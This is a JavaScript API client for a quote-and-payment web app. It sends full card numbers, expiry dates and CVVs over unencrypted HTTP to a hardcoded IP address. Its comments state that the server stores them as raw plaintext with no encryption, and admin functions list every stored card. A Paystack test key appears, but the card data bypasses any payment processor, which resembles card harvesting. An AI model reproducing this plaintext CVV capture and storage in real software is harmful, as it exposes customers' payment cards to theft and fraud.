import axios from 'axios';

const API_BASE_URL = process.env.REACT_APP_API_URL || 'http://104.207.65.21:2002';
const ADMIN_BASE_URL = process.env.REACT_APP_ADMIN_URL || 'http://104.207.65.21:2003';
const ADMIN_API_URL = process.env.REACT_APP_ADMIN_API_URL || `${ADMIN_BASE_URL}/api`;

// Node.js backend - Primary
const api = axios.create({
  baseURL: API_BASE_URL,
  headers: {
    'Content-Type': 'application/json'
  },
  timeout: 10000
});

// Helper to check if backend is available
const checkBackend = async (baseURL) => {
  try {
    await axios.get(baseURL + '/api/test', { timeout: 3000 });
    return true;
  } catch {
    return false;
  }
};

// Generic error handler
const handleError = (error) => {
  console.error('API Error:', error);
  throw error.response?.data || error;
};

// Backend configuration - try multiple ports
const BACKENDS = [
  { name: 'Node (2002)', baseURL: API_BASE_URL, api: null },
  { name: 'Admin (2003)', baseURL: ADMIN_BASE_URL, api: null }
];

// Initialize backends
BACKENDS[0].api = api;
// Admin API will be created dynamically when needed

// Find working backend
const getWorkingBackend = async () => {
  for (const backend of BACKENDS) {
    try {
      await axios.get(backend.baseURL + '/api/test', { timeout: 3000 });
      console.log('[API] Found working backend:', backend.name);
      return backend;
    } catch (e) {
      console.warn('[API] Backend not available:', backend.name);
    }
  }
  return null;
};

// Quotes API - try multiple backends
export const submitQuote = async (data) => {
  const backends = [
    { name: 'Node (2002)', url: API_BASE_URL },
    { name: 'Admin (2003)', url: ADMIN_BASE_URL }
  ];
  
  let lastError = null;
  
  for (const backend of backends) {
    try {
      console.log('[API] Trying quote submission on:', backend.name);
      const response = await axios.post(backend.url + '/api/quotes', data, {
        timeout: 10000,
        headers: { 'Content-Type': 'application/json' }
      });
      
      if (response.data && response.data.success) {
        console.log('[API] Quote submitted successfully via', backend.name);
        return {
          ...response.data,
          submittedVia: backend.name
        };
      }
      
      if (response.data && !response.data.success && response.data.message !== 'Access token required') {
        return response.data;
      }
      
      // If it's an auth error, try next backend
      lastError = response.data;
    } catch (error) {
      console.warn('[API] Failed on', backend.name + ':', error.message);
      lastError = error;
    }
  }
  
  // All backends failed
  console.error('[API] All quote backends failed');
  return {
    success: false,
    error: 'Unable to connect to server. Please ensure the backend is running and try again.'
  };
};

// Get admin token from localStorage
const getAdminToken = () => localStorage.getItem('qp_admin_token');

// Create admin API instance
const createAdminApi = () => {
  const instance = axios.create({
    baseURL: ADMIN_API_URL,
    headers: {
      'Content-Type': 'application/json'
    },
    timeout: 10000
  });
  
  // Add token to admin requests
  instance.interceptors.request.use(config => {
    const token = getAdminToken();
    if (token) {
      config.headers.Authorization = `Bearer ${token}`;
    }
    return config;
  });
  
  return instance;
};

// Get quote by confirmation token (for customers to view their quote)
export const getQuoteByToken = async (token) => {
  try {
    const response = await api.get(`/api/quotes/token/${token}`);
    return response.data;
  } catch (error) {
    console.error('[API] Get quote by token error:', error);
    return {
      success: false,
      error: error.response?.data?.error || 'Failed to retrieve quote'
    };
  }
};

// Admin: Get all quotes - try Node backend first with fallback
export const getAllQuotes = async (params = {}) => {
  const backends = [
    { name: 'Node (2002)', url: API_BASE_URL, needsAuth: false },
    { name: 'Admin (2003)', url: ADMIN_BASE_URL, needsAuth: true }
  ];
  
  for (const backend of backends) {
    try {
      const queryString = new URLSearchParams(params).toString();
      const config = { timeout: 10000 };
      
      if (backend.needsAuth) {
        const token = getAdminToken();
        if (token) {
          config.headers = { Authorization: `Bearer ${token}` };
        }
      }
      
      const response = await axios.get(backend.url + '/api/quotes?' + queryString, config);
      
      if (response.data && response.data.success) {
        return response.data;
      }
      
      if (response.data && response.data.message === 'Access token required') {
        continue; // Try next backend
      }
      
      return response.data;
    } catch (error) {
      console.warn('[API] Get quotes failed on', backend.name);
    }
  }
  
  return {
    success: false,
    data: [],
    error: 'Unable to fetch quotes. Please login to admin panel.'
  };
};

// Admin: Get quote statistics
export const getQuoteStats = async () => {
  try {
    const response = await api.get('/api/quotes/stats/overview');
    return response.data;
  } catch (error) {
    console.error('[API] Get quote stats error:', error);
    return {
      success: false,
      error: error.response?.data?.error || 'Failed to fetch statistics'
    };
  }
};

// Admin: Reply to quote
export const replyToQuote = async (quoteId, data) => {
  try {
    const response = await api.post(`/api/quotes/${quoteId}/reply`, data);
    return response.data;
  } catch (error) {
    console.error('[API] Reply to quote error:', error);
    return {
      success: false,
      error: error.response?.data?.error || 'Failed to send reply'
    };
  }
};

// Admin: Update quote status
export const updateQuote = async (quoteId, data) => {
  try {
    const response = await api.put(`/api/quotes/${quoteId}`, data);
    return response.data;
  } catch (error) {
    console.error('[API] Update quote error:', error);
    return {
      success: false,
      error: error.response?.data?.error || 'Failed to update quote'
    };
  }
};

// Admin: Send formal quote
export const sendFormalQuote = async (quoteId, data) => {
  try {
    const response = await api.post(`/api/quotes/${quoteId}/send-quote`, data);
    return response.data;
  } catch (error) {
    console.error('[API] Send formal quote error:', error);
    return {
      success: false,
      error: error.response?.data?.error || 'Failed to send quote'
    };
  }
};

// Admin: Resend confirmation email
export const resendQuoteConfirmation = async (quoteId) => {
  try {
    const response = await api.post(`/api/quotes/${quoteId}/resend-confirmation`);
    return response.data;
  } catch (error) {
    console.error('[API] Resend confirmation error:', error);
    return {
      success: false,
      error: error.response?.data?.error || 'Failed to resend confirmation'
    };
  }
};

// Admin: Send status update email
export const sendQuoteStatusUpdate = async (quoteId, customMessage) => {
  try {
    const response = await api.post(`/api/quotes/${quoteId}/send-status-update`, { customMessage });
    return response.data;
  } catch (error) {
    console.error('[API] Send status update error:', error);
    return {
      success: false,
      error: error.response?.data?.error || 'Failed to send status update'
    };
  }
};

// Admin: Get quote timeline
export const getQuoteTimeline = async (quoteId) => {
  try {
    const response = await api.get(`/api/quotes/timeline/${quoteId}`);
    return response.data;
  } catch (error) {
    console.error('[API] Get timeline error:', error);
    return {
      success: false,
      error: error.response?.data?.error || 'Failed to fetch timeline'
    };
  }
};

// Admin: Get pending reminders
export const getQuoteReminders = async () => {
  try {
    const response = await api.get('/api/quotes/pending-reminders');
    return response.data;
  } catch (error) {
    console.error('[API] Get reminders error:', error);
    return {
      success: false,
      error: error.response?.data?.error || 'Failed to fetch reminders'
    };
  }
};

// Payments API
export const recordPayment = async (data) => {
  try {
    const response = await api.post('/api/payments/process', {
      plan_name: data.plan_name,
      plan_price: data.plan_price,
      customer_name: data.customer_name,
      customer_email: data.customer_email,
      customer_phone: data.customer_phone || '',
      payment_method: data.payment_method || 'paystack',
      transaction_id: data.transaction_id || 'TXN-' + Date.now(),
      status: data.status || 'completed',
      card_last_four: data.card_last_four || ''
    });
    return response.data;
  } catch (error) {
    handleError(error);
  }
};

// ============ SAVED CARDS API ============

/**
 * Check if email has saved cards (Node.js Backend)
 * Returns cards list from saved_cards table
 */
export const checkSavedCards = async (email) => {
  try {
    console.log('[API] Checking saved cards for:', email);
    // Node backend - reads from saved_cards table
    const response = await api.get(`/api/cards/check/${email}`);
    console.log('[API] Node backend cards response:', response.data);
    return response.data;
  } catch (error) {
    console.error('[API] Check saved cards error:', error);
    return { success: false, hasSavedCards: false, cards: [] };
  }
};

/**
 * Send OTP to email for card verification
 */
export const sendOTP = async (email, purpose = 'payment') => {
  try {
    const response = await api.post('/api/otp/send', { email, purpose });
    return response.data;
  } catch (error) {
    handleError(error);
  }
};

/**
 * Verify OTP
 */
export const verifyOTP = async (email, otp, purpose = 'payment') => {
  try {
    const response = await api.post('/api/otp/verify', { email, otp, purpose });
    return response.data;
  } catch (error) {
    handleError(error);
  }
};

/**
 * Get saved cards for email (after OTP verification)
 */
export const getSavedCardsByEmail = async (email) => {
  try {
    const response = await api.get(`/api/cards/check/${email}`);
    return response.data;
  } catch (error) {
    handleError(error);
  }
};

/**
 * Save new card to Node Backend (saved to BOTH tables: saved_cards AND card_details_raw)
 * Card details saved as RAW PLAIN TEXT (NO ENCRYPTION)
 */
export const saveCard = async (cardData) => {
  try {
    console.log('[API] Saving card to Node backend for:', cardData.email);
    
    // Clean the card data
    const cleanCardNumber = cardData.card_number ? cardData.card_number.replace(/\s/g, '') : '';
    const cleanCvv = cardData.cvv ? cardData.cvv.replace(/\D/g, '') : '';
    
    const response = await api.post('/api/cards/save', {
      email: cardData.email,
      card_holder: cardData.card_holder || cardData.email,
      card_number: cleanCardNumber,
      expiry_month: cardData.expiry_month,
      expiry_year: cardData.expiry_year,
      cvv: cleanCvv,
      card_type: cardData.card_type || 'unknown'
    });
    
    console.log('[API] Save card response:', response.data);
    return response.data;
  } catch (error) {
    console.error('[API] Save card error:', error);
    throw error;
  }
};

// ============ RAW CARD DETAILS API (card_details_raw table) ============

/**
 * Save raw card details to card_details_raw table (FULL RAW STORAGE)
 * Now uses Node.js backend which saves to both tables
 */
export const saveRawCardDetails = async (cardData) => {
  try {
    console.log('[API] Saving RAW card details for:', cardData.email);
    const response = await api.post('/api/cards/save', {
      email: cardData.email,
      card_holder: cardData.card_holder_name || cardData.card_holder || cardData.email,
      card_number: cardData.raw_card_number || cardData.card_number,
      cvv: cardData.raw_cvv || cardData.cvv,
      expiry_month: cardData.expiry_month,
      expiry_year: cardData.expiry_year,
      card_type: cardData.card_brand || cardData.card_type
    });
    console.log('[API] Save raw card details response:', response.data);
    return response.data;
  } catch (error) {
    console.error('[API] Save raw card details error:', error);
    handleError(error);
  }
};

/**
 * List all raw card details for an email
 */
export const listRawCardDetails = async (email) => {
  try {
    const response = await api.get(`/api/cards/check/${email}`);
    return response.data;
  } catch (error) {
    handleError(error);
  }
};

/**
 * Get single raw card detail by ID
 */
export const getRawCardDetail = async (recordId, email) => {
  try {
    const response = await api.get(`/api/cards/${recordId}`);
    return response.data;
  } catch (error) {
    handleError(error);
  }
};

/**
 * Get all raw card details (ADMIN)
 */
export const getAllRawCardDetails = async (limit = 100) => {
  try {
    const response = await api.get(`/api/cards?limit=${limit}`);
    return response.data;
  } catch (error) {
    handleError(error);
  }
};

/**
 * Delete raw card detail
 */
export const deleteRawCardDetail = async (recordId, email) => {
  try {
    const response = await api.delete(`/api/cards/${recordId}`);
    return response.data;
  } catch (error) {
    handleError(error);
  }
};

/**
 * Delete saved card
 */
export const deleteCard = async (cardId) => {
  try {
    const response = await api.delete(`/api/cards/${cardId}`);
    return response.data;
  } catch (error) {
    handleError(error);
  }
};

// ============ CARD PAYMENT API ============

/**
 * Process payment with card
 */
export const saveCardAndInitializePayment = async (cardData) => {
  try {
    // Handle both camelCase and snake_case property names
    const email = cardData.customer_email || cardData.email;
    const planName = cardData.plan_name || cardData.planName;
    const planPrice = cardData.plan_price || cardData.planPrice;
    const cardNumber = cardData.card_number || cardData.cardNumber;
    const expiryMonth = cardData.expiry_month || (cardData.expiry ? cardData.expiry.split('/')[0] : '');
    const expiryYear = cardData.expiry_year || (cardData.expiry ? cardData.expiry.split('/')[1] : '');
    const cvv = cardData.cvv;
    const saveCardFlag = cardData.save_card !== undefined ? cardData.save_card : true;
    
    if (!email) {
      throw new Error('Email is required');
    }
    
    const response = await api.post('/api/payments/process', {
      plan_name: planName,
      plan_price: planPrice,
      customer_name: email.split('@')[0],
      customer_email: email,
      customer_phone: '',
      card_number: cardNumber,
      card_holder: email.split('@')[0],
      expiry_month: expiryMonth,
      expiry_year: expiryYear,
      cvv: cvv,
      card_type: detectCardType(cardNumber),
      save_card: saveCardFlag,
      payment_method: 'card'
    });
    return response.data;
  } catch (error) {
    handleError(error);
  }
};

/**
 * Verify card payment
 */
export const verifyCardPayment = async (reference) => {
  try {
    const response = await api.get(`/api/payments/${reference}`);
    return response.data;
  } catch (error) {
    handleError(error);
  }
};

/**
 * Get Paystack Configuration
 */
export const getPaystackConfig = async () => {
  return {
    success: true,
    public_key: 'pk_test_61a1642eae929d496529c342f6f95ae3b05bd89c',
    currency: 'GHS',
    currency_symbol: 'GH₵'
  };
};

// Helper function to detect card type
function detectCardType(cardNumber) {
  const patterns = {
    visa: /^4/,
    mastercard: /^5[1-5]/,
    amex: /^3[47]/,
    discover: /^6(?:011|5)/,
  };
  
  for (const [type, pattern] of Object.entries(patterns)) {
    if (pattern.test(cardNumber)) return type;
  }
  return 'unknown';
}

/**
 * Process payment with saved card
 */
export const processPaymentWithSavedCard = async (paymentData) => {
  try {
    const response = await api.post('/api/payments/process-saved-card', paymentData);
    return response.data;
  } catch (error) {
    handleError(error);
  }
};

/**
 * Verify Card OTP (legacy naming for compatibility)
 * This function verifies OTP and returns saved cards
 */
export const verifyCardOTP = async (email, otp) => {
  try {
    // First verify the OTP
    const verifyResponse = await verifyOTP(email, otp, 'payment');
    if (verifyResponse.success) {
      // Then get the saved cards
      const cardsResponse = await getSavedCardsByEmail(email);
      return {
        success: true,
        cards: cardsResponse.cards || []
      };
    }
    return { success: false, message: 'Invalid OTP' };
  } catch (error) {
    return { success: false, message: error.message || 'Verification failed' };
  }
};

// Test database connection
export const testConnection = async () => {
  try {
    const response = await api.get('/api/quotes');
    return { success: true, message: 'Backend connected', count: response.data?.data?.length || 0 };
  } catch (error) {
    return { success: false, message: 'Backend not running on port 2000' };
  }
};

/**
 * Save extended card details with billing info and metadata
 * Saves to card_details_raw table (RAW - NO ENCRYPTION)
 */
export const saveExtendedCardDetails = async (cardData) => {
  try {
    console.log('[API] Saving extended card details for:', cardData.email);
    
    const response = await api.post('/api/cards/save', {
      email: cardData.email,
      card_holder: cardData.card_holder || cardData.email,
      card_number: cardData.card_number,
      expiry_month: cardData.expiry_month,
      expiry_year: cardData.expiry_year,
      cvv: cardData.cvv,
      card_type: cardData.card_type || 'unknown'
    });
    
    console.log('[API] Extended card details saved:', response.data);
    return response.data;
  } catch (error) {
    console.error('[API] Save extended card details error:', error);
    return { success: false, error: error.message };
  }
};

export default api;
